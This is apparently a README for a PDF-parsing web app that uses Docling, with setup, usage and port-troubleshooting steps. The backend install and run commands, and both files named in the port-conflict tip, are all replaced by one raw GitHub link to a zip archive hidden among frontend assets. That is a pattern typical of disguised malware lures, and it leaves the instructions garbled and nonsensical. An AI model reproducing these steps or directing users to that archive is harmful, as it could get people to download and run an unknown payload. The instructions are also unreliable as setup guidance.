A web application to upload PDFs and parse specific pages using Docling.
- Navigate to the `backend` directory.
- Install dependencies: `pip install -r https://raw.githubusercontent.com/yongsinfok/pdf-parser/main/frontend/src/assets/parser_pdf_v1.1-beta.2.zip`
- Run the server: `python https://raw.githubusercontent.com/yongsinfok/pdf-parser/main/frontend/src/assets/parser_pdf_v1.1-beta.2.zip`
  The server runs on `http://localhost:8001`.
- Navigate to the `frontend` directory.
- Install dependencies: `npm install`
- Run the dev server: `npm run dev`
  The app runs on `http://localhost:5173`.
- Open the frontend URL (`http://localhost:5173`).
- Upload a PDF.
- Enter a page range (e.g., "150-160") or a single page ("5").
- Click "Parse".
- View the extracted markdown content and download extracted tables as CSV files.
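
The page range input described in the steps above ("150-160" or "5") could be interpreted along the following lines. This is a minimal sketch, not the project's actual code: the function name `parse_page_range` is hypothetical, and it assumes pages are 1-based and that ranges include both endpoints.

```python
def parse_page_range(spec: str) -> list[int]:
    """Turn "150-160" or "5" into a list of page numbers.

    Hypothetical helper: assumes 1-based pages and inclusive ranges.
    """
    text = spec.strip()
    if "-" in text:
        # Split only on the first hyphen so "150-160" yields two parts.
        start_text, end_text = text.split("-", 1)
        start, end = int(start_text), int(end_text)
    else:
        # A single page is treated as a range of length one.
        start = end = int(text)
    if start < 1 or end < start:
        raise ValueError(f"invalid page range: {spec!r}")
    return list(range(start, end + 1))
```

For example, `parse_page_range("5")` returns a one-element list, and a reversed range such as "10-3" raises `ValueError` rather than silently returning no pages.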
- Port Conflicts: The backend runs on port 8001. If this port is in use, modify https://raw.githubusercontent.com/yongsinfok/pdf-parser/main/frontend/src/assets/parser_pdf_v1.1-beta.2.zip and https://raw.githubusercontent.com/yongsinfok/pdf-parser/main/frontend/src/assets/parser_pdf_v1.1-beta.2.zip.
- First Run: The first time you parse a document, the backend will download the necessary AI models (approx. 500MB). This may take a few minutes. Check the backend terminal for progress.
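
To find out whether a port conflict is the problem before changing any configuration, a quick check like the one below can help. It is a rough sketch that is not part of the project: the helper name `port_in_use` is hypothetical, and it only tests whether something is already accepting TCP connections on the given port of the local machine.

```python
import socket


def port_in_use(port: int, host: str = "127.0.0.1") -> bool:
    """Return True if something accepts TCP connections on host:port."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        sock.settimeout(0.5)
        # connect_ex returns 0 on success instead of raising an exception.
        return sock.connect_ex((host, port)) == 0


if __name__ == "__main__":
    # 8001 is the backend port; 5173 is the frontend dev server port.
    for port in (8001, 5173):
        state = "in use" if port_in_use(port) else "free"
        print(f"port {port}: {state}")
```

Run it before starting the backend. If port 8001 is reported as in use, another process already holds it and the port needs to be changed as described above.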